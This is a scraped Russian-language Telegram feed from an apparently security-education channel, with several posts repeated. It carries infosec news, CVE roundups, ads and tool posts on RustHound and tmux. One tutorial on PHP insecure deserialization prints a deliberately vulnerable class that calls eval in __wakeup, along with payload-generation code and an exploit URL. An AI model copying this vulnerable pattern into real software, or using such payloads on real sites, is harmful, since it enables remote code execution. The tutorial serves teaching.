🧠Чему вы бы хотели научиться?
Расскажите нам о ваших пожеланиях: какие навыки вы хотели бы прокачать в ближайшее время или какую профессию хотели бы приобрести?
За прохождение опроса вы получите промокод на скидку 15% на все наши курсы до конца 2024 года.
👉Опрос по ссылке👈
Расскажите нам о ваших пожеланиях: какие навыки вы хотели бы прокачать в ближайшее время или какую профессию хотели бы приобрести?
За прохождение опроса вы получите промокод на скидку 15% на все наши курсы до конца 2024 года.
👉Опрос по ссылке👈
😁4👏2❤1🥱1
🎄Уже решали Advent of Cyber 2023 от TryHackMe? Если нет, то у вас еще есть больше двух недель!
🤩 Но если решать некогда или не хватает скиллов, читайте райтапы каждого дня в блоге Karthikeyan Nagaraj.
#ctf #practice
#ctf #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
⚡Очередная подборка новостей для этичного хакера: навёрстываем пропущенные новостные выпуски
👀 MEGANews. Самые важные события в мире инфосека за октябрь от журнала «Хакер»:
• Отражен мощнейший DDoS в истории
• Утекли исходники HelloKitty
• Обнаружены Android-девайсы с бэкдором
• Microsoft запретит активацию старыми ключами
• Арестован разработчик Ragnar Locker
• Уязвимости curl оказались нестрашными
• Массовые атаки на Cisco IOS XE
• Уязвимости в Squid исправляют 2,5 года
• Microsoft отказывается от VBScript
• Устройствам Apple угрожает iLeakage
🔐 Самые громкие события инфобеза за ноябрь по версии компании T.Hunter:
• Официальный запуск CVSS 4.0
• NVIDIA в центре скандала с промышленным шпионажем
• Масштабная уязвимость в ключах биткоин-кошельков
• Провинившийся Binance и отправившийся на дно Sinbad
• Финальный удар по операторам LockerGoga и MegaCortex
🔥 Топ самых интересных CVE за ноябрь по версии компании T.Hunter:
• CVE-2023-5941: выполнение произвольного кода в ОС FreeBSD
• CVE-2023-5996/CVE-2023-5997: Use-after-free в компонентах/Garbage/Navigation Google Chrome
• CVE-2023-47640/CVE-2023-47629: повышение привилегий в DataHub
• CVE-2023-47444: удаленное выполнение кода на сервере в OpenCart
• CVE-2023-47585/CVE-2023-47584/CVE-2023-47586: многочисленные уязвимости в продуктах Fuji Electric
• CVE-2023-43612/CVE-2023-6045: уязвимости в OpenHarmony
• CVE-2023-6176: отказ в обслуживании в ядре Linux
• CVE-2023-32629: повышение привилегий в OverlayFS ядра Ubuntu
🌐 Security-новости от SecLab:
• Израильская ИИ-система «Евангелие» / Экстренное обновление Chrome / Жестокость вне закона
• Ноутбуки и лживая биометрия / Кибербез 2024: чего ждать? / Бил Гейтс предсказал «малину»
• Опасные рекламные данные / сколько стоит ликвидация атаки / 100 тысяч ключей от Google
• Каким будет VPN в России / Нет айтишников — нет эффективности / исторический запрет на ИИ
• CVSS 4.0 — новый стандарт / Кибервойска: мнение Минцифры / Двойной листинг и шантаж законом
#чтопроисходит #news
• Отражен мощнейший DDoS в истории
• Утекли исходники HelloKitty
• Обнаружены Android-девайсы с бэкдором
• Microsoft запретит активацию старыми ключами
• Арестован разработчик Ragnar Locker
• Уязвимости curl оказались нестрашными
• Массовые атаки на Cisco IOS XE
• Уязвимости в Squid исправляют 2,5 года
• Microsoft отказывается от VBScript
• Устройствам Apple угрожает iLeakage
• Официальный запуск CVSS 4.0
• NVIDIA в центре скандала с промышленным шпионажем
• Масштабная уязвимость в ключах биткоин-кошельков
• Провинившийся Binance и отправившийся на дно Sinbad
• Финальный удар по операторам LockerGoga и MegaCortex
🔥 Топ самых интересных CVE за ноябрь по версии компании T.Hunter:
• CVE-2023-5941: выполнение произвольного кода в ОС FreeBSD
• CVE-2023-5996/CVE-2023-5997: Use-after-free в компонентах/Garbage/Navigation Google Chrome
• CVE-2023-47640/CVE-2023-47629: повышение привилегий в DataHub
• CVE-2023-47444: удаленное выполнение кода на сервере в OpenCart
• CVE-2023-47585/CVE-2023-47584/CVE-2023-47586: многочисленные уязвимости в продуктах Fuji Electric
• CVE-2023-43612/CVE-2023-6045: уязвимости в OpenHarmony
• CVE-2023-6176: отказ в обслуживании в ядре Linux
• CVE-2023-32629: повышение привилегий в OverlayFS ядра Ubuntu
• Израильская ИИ-система «Евангелие» / Экстренное обновление Chrome / Жестокость вне закона
• Ноутбуки и лживая биометрия / Кибербез 2024: чего ждать? / Бил Гейтс предсказал «малину»
• Опасные рекламные данные / сколько стоит ликвидация атаки / 100 тысяч ключей от Google
• Каким будет VPN в России / Нет айтишников — нет эффективности / исторический запрет на ИИ
• CVSS 4.0 — новый стандарт / Кибервойска: мнение Минцифры / Двойной листинг и шантаж законом
#чтопроисходит #news
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤2🤩2🔥1
Собираетесь ли вы развиваться и заниматься программированием на новогодних праздниках? Что именно будете делать?
Anonymous Poll
32%
Попробую освоить новые инструменты и подходы к разработке
5%
Приму участие в хакатонах
14%
Посмотрю фильмы и сериалы про IT
26%
Поработаю над собственными проектами — добавлю новую функциональность
39%
Почитаю книги и статьи по программированию — расширю кругозор
48%
Просто отдохну и наберусь сил
5%
Свой вариант (напишу в комментариях)
👍4❤1🥱1
Самые полезные каналы для программистов в одной подборке!
Сохраняйте себе, чтобы не потерять 💾
🔥Для всех
Библиотека программиста — новости, статьи, досуг, фундаментальные темы
Книги для программистов
IT-мемы
Proglib Academy — тут мы рассказываем про обучение и курсы
#️⃣C#
Библиотека шарписта
Библиотека задач по C# — код, квизы и тесты
Библиотека собеса по C# — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Вакансии по C#, .NET, Unity Вакансии по PHP, Symfony, Laravel
☁️DevOps
Библиотека devops’а
Вакансии по DevOps & SRE
Библиотека задач по DevOps — код, квизы и тесты
Библиотека собеса по DevOps — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
🐘PHP
Библиотека пхпшника
Вакансии по PHP, Symfony, Laravel
Библиотека PHP для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по PHP — код, квизы и тесты
🐍Python
Библиотека питониста
Вакансии по питону, Django, Flask
Библиотека Python для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Python — код, квизы и тесты
☕Java
Библиотека джависта — полезные статьи по Java, новости и обучающие материалы
Библиотека Java для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Java — код, квизы и тесты
Вакансии для java-разработчиков
👾Data Science
Библиотека Data Science — полезные статьи, новости и обучающие материалы
Библиотека Data Science для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Data Science — код, квизы и тесты
Вакансии по Data Science, анализу данных, аналитике, искусственному интеллекту
🦫Go
Библиотека Go разработчика — полезные статьи, новости и обучающие материалы по Go
Библиотека Go для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Go — код, квизы и тесты
Вакансии по Go
🧠C++
Библиотека C/C++ разработчика — полезные статьи, новости и обучающие материалы по C++
Библиотека C++ для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по C++ — код, квизы и тесты
Вакансии по C++
💻Другие профильные каналы
Библиотека фронтендера
Библиотека мобильного разработчика
Библиотека хакера
Библиотека тестировщика
💼Каналы с вакансиями
Вакансии по фронтенду, джаваскрипт, React, Angular, Vue
Вакансии для мобильных разработчиков
Вакансии по QA тестированию
InfoSec Jobs — вакансии по информационной безопасности
📁Чтобы добавить папку с нашими каналами, нажмите 👉сюда👈
🤖Также у нас есть боты:
Бот с IT-вакансиями
Бот с мероприятиями в сфере IT
Мы в других соцсетях:
🔸VK
🔸YouTube
🔸Дзен
🔸Facebook *
🔸Instagram *
* Организация Meta запрещена на территории РФ
Сохраняйте себе, чтобы не потерять 💾
🔥Для всех
Библиотека программиста — новости, статьи, досуг, фундаментальные темы
Книги для программистов
IT-мемы
Proglib Academy — тут мы рассказываем про обучение и курсы
#️⃣C#
Библиотека шарписта
Библиотека задач по C# — код, квизы и тесты
Библиотека собеса по C# — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Вакансии по C#, .NET, Unity Вакансии по PHP, Symfony, Laravel
☁️DevOps
Библиотека devops’а
Вакансии по DevOps & SRE
Библиотека задач по DevOps — код, квизы и тесты
Библиотека собеса по DevOps — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
🐘PHP
Библиотека пхпшника
Вакансии по PHP, Symfony, Laravel
Библиотека PHP для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по PHP — код, квизы и тесты
🐍Python
Библиотека питониста
Вакансии по питону, Django, Flask
Библиотека Python для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Python — код, квизы и тесты
☕Java
Библиотека джависта — полезные статьи по Java, новости и обучающие материалы
Библиотека Java для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Java — код, квизы и тесты
Вакансии для java-разработчиков
👾Data Science
Библиотека Data Science — полезные статьи, новости и обучающие материалы
Библиотека Data Science для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Data Science — код, квизы и тесты
Вакансии по Data Science, анализу данных, аналитике, искусственному интеллекту
🦫Go
Библиотека Go разработчика — полезные статьи, новости и обучающие материалы по Go
Библиотека Go для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по Go — код, квизы и тесты
Вакансии по Go
🧠C++
Библиотека C/C++ разработчика — полезные статьи, новости и обучающие материалы по C++
Библиотека C++ для собеса — тренируемся отвечать на каверзные вопросы во время интервью и технического собеседования
Библиотека задач по C++ — код, квизы и тесты
Вакансии по C++
💻Другие профильные каналы
Библиотека фронтендера
Библиотека мобильного разработчика
Библиотека хакера
Библиотека тестировщика
💼Каналы с вакансиями
Вакансии по фронтенду, джаваскрипт, React, Angular, Vue
Вакансии для мобильных разработчиков
Вакансии по QA тестированию
InfoSec Jobs — вакансии по информационной безопасности
📁Чтобы добавить папку с нашими каналами, нажмите 👉сюда👈
🤖Также у нас есть боты:
Бот с IT-вакансиями
Бот с мероприятиями в сфере IT
Мы в других соцсетях:
🔸VK
🔸YouTube
🔸Дзен
🔸Facebook *
🔸Instagram *
* Организация Meta запрещена на территории РФ
❤3👍3😁2🔥1
Business Logic Vulnerability_ Payment bypass.pdf
2.4 MB
Кажется, уже не надо никому доказывать, что уязвимости бизнес-логики выходят на первый план. Поэтому каждый райтап — на вес золота.
Vrushabh Doshi, Senior Security Engineer в GoKloud, делится опытом поиска и эксплуатации простых багов бизнес-логики.
👉 Читайте на Medium или в PDF
#writeup #pentest #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2
📌 Что вообще из себя представляет уязвимость под названием «Небезопасная десериализация»?
Небезопасная десериализация — это когда контролируемые нами данные десериализуются веб-приложением. Это позволяет манипулировать сериализованными объектами для передачи вредоносных данных в код приложения.
Для сериализации и десериализации в PHP используются функции
serialize() и unserialize().Первая принимает в качестве параметра объект и возвращает его сериализованное представление в виде строки. Вторая — строку, содержащую сериализованный объект, и возвращает десериализованный объект, восстановленный из этой строки.
📌 Простой пример:
<?php
class Injection {
public $some_data;
function __wakeup() {
if(isset($this->some_data)) {
eval($this->some_data);
}
}
}
if(isset($_REQUEST['data'])) {
$result = unserialize($_REQUEST['data'])
// do something with $result object //
}
В примере присутствует класс Injection, реализующий магический метод
__wakeup(), который будет выполнен сразу после десериализации объекта класса Injection и исполнит код, хранящийся в переменной класса $some_data.📌 Сгенерируем пэйлоад для эксплуатации подобной конструкции:
<?php
class Injection{
public $some_data;
function __wakeup(){
if(isset($this->some_data)){
eval($this->some_data);
}
}
}
$inj = new Injection();
$inj->some_data = "phpinfo();";
echo(serialize($inj)); ?>
В результате выполнения кода получим сериализованный объект:
O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
И обратимся к нашему уязвимому приложению, передав в качестве данных в параметре
data полученный сериализованный объект:https://example.com/vulnerable.php?data=O:9:"Injection":1:{s:9:"some_data";s:10:"phpinfo();";}
В результате исполнения данного кода и десериализации переданного объекта будет исполнена встроенная функция
phpinfo(). Общий посыл должен быть понятен. Для эксплуатации небезопасной десериализации часто используется инструмент PHPGGC, который позволяет генерировать пэйлоад без необходимости проходить утомительные шаги по поиску гаджетов и их объединению.
#pentest #writeup #practice #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Fenrisk
Gadgets chain in Wordpress
Security experts
👍4⚡2
Forwarded from Библиотека программиста | программирование, кодинг, разработка
This media is not supported in the widget
VIEW IN TELEGRAM
👍4
Что делать, если перепробовал все техники атак на инфраструктуру Windows и ничего не выгорело? Правильно, искать ошибки администрирования.
Читайте интересный пошаговый разбор взлома корпоративной сети и некоторые рекомендации по защите.
#pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Побег из песочницы и захват леса — реальный сценарий взлома корпоративной сети
Пришло время рассказать о еще одном векторе атак на внутренние сети компаний. На этот раз речь пойдет о ситуации, в которой у меня не было прямого доступа к компьютеру, а хосты оказались неуязвимы к...
🔥3👍2
Главная фича — сохранение состояний подключений и процессов. После разрыва соединения с сервером вы подключаетесь, и все запущенные программы и процессы продолжают работать. Дополнительно можно работать совместно с другими в терминале, если все подключены к одной сессии.
А здесь вас ждет одна из лучших шпаргалок по работе с Tmux, которая включает базовые команды.
#cheatsheet #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥4❤2🥰2
🌎 ТОП-10: рейтинг лучших зарубежных работодателей в IT
При составлении рейтинга учитывали различные факторы из открытых данных портала Glassdoor, включая отзывы сотрудников, уровень лояльности действующих и бывших сотрудников, зарплата, льготы, бонусы и прочие бенефиты.
1️⃣ Red Hat
2️⃣ Gainsight
3️⃣ Box
4️⃣ MathWorks
5️⃣ ServiceNow
6️⃣ Marvell Technology
7️⃣ CrowdStrike
8️⃣ Fortinet
9️⃣ NetApp
🔟 Genentech
👉 Читать статью
При составлении рейтинга учитывали различные факторы из открытых данных портала Glassdoor, включая отзывы сотрудников, уровень лояльности действующих и бывших сотрудников, зарплата, льготы, бонусы и прочие бенефиты.
1️⃣ Red Hat
2️⃣ Gainsight
3️⃣ Box
4️⃣ MathWorks
5️⃣ ServiceNow
6️⃣ Marvell Technology
7️⃣ CrowdStrike
8️⃣ Fortinet
9️⃣ NetApp
🔟 Genentech
👉 Читать статью
🥱3👍2
This media is not supported in your browser
VIEW IN TELEGRAM
📌 В чем преимущества по сравнению с инструментом сбора данных SharpHound:
☑️ Кроссплатформенность
☑️ Меньше вероятность обнаружения антивирусами
☑️ Кросс-компиляция
☑️ Генерация JSON-файлов для различных доменнных сущностей
☑️ Модули и функции, которые расширяют базовый функционал
☑️ Оптимизация размера бинарного файла
☑️ Производительность: согласно представленной статистике,
RustHound работает быстрее, чем SharpHound и BloodHound.py в тестах на контроллерах доменнов с большим количеством объектов LDAPВажно помнить, что
RustHound все еще находится в разработке, и не все фичи SharpHound реализованы.👉 GitHub
#tools #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
Самые известные эксплуатируемые уязвимости в 2023 году по версии агентства по кибербезопасности и безопасности инфраструктуры (CISA).
⚙ Методология и ключевые выводы
#security
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3👏1
Domain of Thrones_ Part I. When Adversaries Play for Keeps.pdf
2.7 MB
⚔ Кроме того, автор предлагает эффективные стратегии восстановления, стремясь к более удовлетворительному решению, чем финал «Игры престолов».
👉 Читайте на Medium или в PDF
#redteam #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👏4
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Память как у пингвина: Работа памяти в Linux
Начнем издалека. В спецификации любого компьютера и в частности сервера непременно числится надпись "N гигабайт оперативной памяти" - именно столько в его распоряжении находится физической памяти....
👍5🔥3